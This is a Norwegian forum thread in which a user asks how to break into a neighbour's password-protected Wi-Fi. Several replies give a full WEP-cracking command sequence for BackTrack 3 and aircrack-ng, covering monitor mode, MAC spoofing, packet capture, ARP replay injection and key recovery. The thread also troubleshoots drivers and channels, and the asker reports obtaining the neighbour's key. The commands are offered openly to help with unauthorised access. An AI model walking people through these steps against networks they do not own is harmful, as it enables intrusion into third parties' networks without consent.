Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  34 3984
Har lest litt rundt på forumet, men enda ikke kommet frem til et konkret svar på det jeg lurer på.

Jeg har ikke tilgang til nett der jeg bor, men det er noen ved meg som har trådløst nett som jeg får inn gode signaler på. Så lurer jeg på om det er mulighet for meg å klare å komme meg inn på det?

Var inne på det tidligere, men brukeren har satt passord på det nå, han hadde ikke passord på routeren tidligere, finnes det noen måte å komme seg inn på routeren, uten å ha passordet til nettverket?

Hvis jeg ønsker å komme meg inn på netverket hans, hvordan finner jeg ut om brukeren har WEP eller WPA kryptering? Går det ann og komme seg inn på nettet til brukeren ved hjelp av Windows, eller må man bruke linux?

Alle svar er tatt imot med takk :-)
Backtrack 3, og aircrack-ng Er alt jeg fikk ut av forumet, under mine desperate forsøk på naboens nettverk lykke til
http://www.freakforum.nu/forum/showthread.php?t=83214

kort forklart så må du få korte i sniffer mode , del 2 er å sniffe nok trafikk. del3 er å crack trafikken.
så kan du gå inn på routern hans.
Å finne ut om hva slags kryptering brukeren har er ikke vanskelig. Da ser du bare på nettverkinformasjonen til det nettverket du vil ha krypteringen til (pleier å ligge under "Egenskaper").
Teknikk, fikk du det til da?

Fant ut at det var WEP ut fra egenskapene.
Er det utrolig komplisert for meg å komme meg inn på nettverket, hvis jeg bruker windows?

Er det forresten slik at jeg må ha en router tilgjengelig for at det skal være mulig for meg å komme meg inn på nettverket?
Sist endret av Thomas90; 20. oktober 2009 kl. 21:58.
Les litt om backtrack. Tok meg litt tid å sette meg inn det. Og faktisk få det til. Men nå er det utrolig enkelt.
Kan også kjøre backtrack fra en minnepenn. Det er nesten enklere enn å instalere programmer i windows.
Er det noen som kan sende nedlastningslinken til aircrack -ng for windows?
Sitat av Thomas90 Vis innlegg
Er det noen som kan sende nedlastningslinken til aircrack -ng for windows?
Vis hele sitatet...
du HØRTE ikke hva jeg sa som normalt. skal du bruke windows MÅ du bytte driver på wlan kort ditt. du må alså ha rett wlan kort/model.
www.wildpackets.com har driver. ELLER commview.
når det funker kan du laste ned airodump , som ligger i aircrack
http://download.aircrack-ng.org/aircrack-ng-1.0-win.zip
har en HP pailion dv 6060, vet du hvordan driver jeg trenger da?
Om du har så lite kunnskaper, og heller ikke kan lete litt frem selv så tror jeg det blir ytterst vannskelig for deg å komme inn på dette wlanet.
Vet ikke om det bare er meg eller, men finner ikke airdump-ng i backtracker 3. Noen som vet hvor det ligger?
Fyr opp terminalen. Det er en svart boks nede i backtrack.
Der skal du utføre kommandoer.

Blant annet airdump-ng, skriver du i terminalen altså.
Sist endret av Colafreak; 22. oktober 2009 kl. 19:03.
men hva er komandoen for å starte programmet? Hjelper ikke bare skrive filnavnet.
Altså:

Jeg klarte det med Backtrack 3, og en laaaang liste med kommandoer, som er:

¨airmon-ng
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
airodump-ng (interface)
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap)


Bytt ut interface med wireless adapter. Feks. wlan0 eller wifi0 eller ath0 osv osv.¨

Det overstående er sitat frra Feint, han mumiduden...

Lykke til Måtte IKKE bytte driver

PS: HUSK Backtrack 3, den er den beste
fikk det til.

Når jeg skal sette hvilket nettverkskort den skal bruke så får jeg opp en liste med 3 stk.

lo
wlan0
wmaster0

Hvem av de er det jeg skal bruke da?
Sitat av Teknikk Vis innlegg
Altså:

Jeg klarte det med Backtrack 3, og en laaaang liste med kommandoer, som er:

¨airmon-ng
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
airodump-ng (interface)
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap)


Bytt ut interface med wireless adapter. Feks. wlan0 eller wifi0 eller ath0 osv osv.¨

Det overstående er sitat frra Feint, han mumiduden...

Lykke til Måtte IKKE bytte driver

PS: HUSK Backtrack 3, den er den beste
Vis hele sitatet...
my god, snakk om å lese...

bruker man WINDOWS, må man gjerne bytte drivere. i backtrack trenger mn nesten ikke gjøre noen ting, bare fyre på med den lista der




wlan0 skal du bruke
Sist endret av VivaLatrina; 22. oktober 2009 kl. 19:25.
kom helt til "airmon-ng start (interface)" da kom det opp "ERROR: Neither the sysfs interface links nor the iw command is available"
Skrevet riktig kort(eks wlon0)?
når jeg skriver iwconfig så kommer det opp

lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extentions.

wlan0 IEEE 802.11g ESSID "" Nickname ""
Mode: Managed Frequency: 2.442 GHz Access point: Not-associated
osv osv....


Jeg skrev "airmon-ng start wlan0"
Sist endret av Thomas90; 22. oktober 2009 kl. 19:45.
Dette har jeg ikke vært borti, prøver her nå, ser om det fungerer
leste litt en annen plass i ste, der sto det:

i have the same card, to enable monitor mode i type the following

iwconfig shows the interface is wlan0
modprobe -r iwl3945 tells backtrack to dismount iwl3945 driver
modprobe ipwraw tells backtrack to load ipwraw driver
airmon-ng start wifi0 use interface wifi0 at this point as last 2 steps changed it

så gjorde jeg det, og nå finner jeg ingen nettverk i kismet... :/

Edit: ser ut som det går greit.

Er det slik at når jeg har skrevet feks "airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)" så skal jeg la komandovinduet stå åpent mens det driver å teller, eller skal jeg lukke det og åpne et nytt før jeg fortsetter?

ser når jeg skal skrive jeg skal skrive "aireplay-ng -1 0 -a (bssid)" osv så kommer det bare opp "aireplay -ng --help" for help.
Går strålende her... Fungerer ihvertfall... Prøvd VMWARE image? Fungerer alltid
Les det som står ovenfor da, der er problemet mitt nå :s
Men hva bruker du? Booter du op med Backtrack eller?
Ser at det kommer masse #data, men når jeg skal skrive de "aireplay-ng komandoene du skrev, så ser det ikke ut som om det er riktig skrevet siden det bare kommer opp "aireplay-ng --help" for help.

Booter opp backtracker med cd, men er jo ikke det som er problemet, alt det du skrev at jeg skulle gjøre av det som sto på den listen gjør jeg, men som sagt så ser det ikke ut som kommandoen er riktig.
Sist endret av Thomas90; 22. oktober 2009 kl. 20:28.
Da har du skrevet feil tror jeg, ellers så vet jeg ikke
"aireplay-ng -1 0 -a 00:02:72:4A:BF:E6 -h 00:11:22:33:44:55 -e test wlan wifi0" Der har du eksakt det jeg skriver.
Bekalger, jeg SER ingen feil, men det KAN være det. Spør ranvik. Han kan ALT om sånne ting.

Lykke til!

Stikker nå.. Beklager om jeg ikke er til hjelp
hmm, sykt kjedelig.. Alt ser ut til å gå greit ellers da.. Tusen takk for hjelpen sålangt da

Ingen andre som vet hva som er feil med siste kommandoen?

Når det står 0 på PWR vil det si at jeg ikke har noe som helst signal fra routeren?

Der fikk jeg enderlig tak i WEP nøkkelen! Tusen takk til alle som har hjulpet meg! <NFF3
Sist endret av Thomas90; 22. oktober 2009 kl. 20:35.
Sitat av Thomas90 Vis innlegg
"aireplay-ng -1 0 -a 00:02:72:4A:BF:E6 -h 00:11:22:33:44:55 -e test wlan wifi0" Der har du eksakt det jeg skriver.
Vis hele sitatet...
aireplay-ng -1 0 -a 00:02:72:4A:BF:E6 -h 00:11:22:33:44:55 -e "test wlan" wifi0

Edit: evt. kan du prøve å utelate "-e test wlan"

Edit 2: Så først nå at du allerede fikk det til. Gratulerer
Sist endret av galskapen; 24. oktober 2009 kl. 20:44.
Sitat av Thomas90 Vis innlegg
"aireplay-ng -1 0 -a 00:02:72:4A:BF:E6 -h 00:11:22:33:44:55 -e test wlan wifi0" Der har du eksakt det jeg skriver.
Vis hele sitatet...
00:11:22:33:44:55 skal være mac adressa DIN ! for å finne den skrive ifconfig
da vil det står wifi0 så mac adressen (alle nullen på SLUTTEN skal droppes)

aireplay-ng -1 0 -a 00:02:72:4A:BF:E6 -h 00:11:22:33:44:55 wifi0

så får du at mac er asosiert med ap, så start aireplay.


http://www.youtube.com/watch?v=oHq-cKoYcr8 <- gjør som han gjør :-)
han bytter FØRST mac adressen til 00:11:22:33:44:55 , da slipper du skrive ifconfig. måten
Hei har instalert backtrack 3 og skulle få med inn på ett nettverk som er kryptert, har lest gjennom å fulgt den lange listen me kommandoer, men når jeg var kommet til "aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)" så kommer det opp "rausb0 is on channel 9, but the AP uses channel 11" Hva må jeg gjøre da?

Tror dette kan komme av at jeg skrev feil på (file name). Hva er i dette tilfellet file name?
Sitat av ConHaX Vis innlegg
Hei har instalert backtrack 3 og skulle få med inn på ett nettverk som er kryptert, har lest gjennom å fulgt den lange listen me kommandoer, men når jeg var kommet til "aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)" så kommer det opp "rausb0 is on channel 9, but the AP uses channel 11" Hva må jeg gjøre da?

Tror dette kan komme av at jeg skrev feil på (file name). Hva er i dette tilfellet file name?
Vis hele sitatet...
du sniffer på feil kanal ! bytt airdump til samme nr som ap'en er på.
Ahh Takk fant ut :-)
▼ ... noen uker senere ... ▼
Halla!
Kanskje litt sen med å kommentere i denne tråden, men men...
Jeg slite med å få til BT 3, Jeg kjører det fra en formatert (FAT32) minnepinne. Jeg kjører bootinst som administrator, jeg får opp installeren i cmd, Disk C: should be bootable now. installation finished.
Hva gjør jeg etterpå dette?

ja, jeg går innpå BIOS, og velger kjøre fra USB. Men da får jeg en error, som som sier noe om at this sould not happend, failed. hva gjør jeg med dette?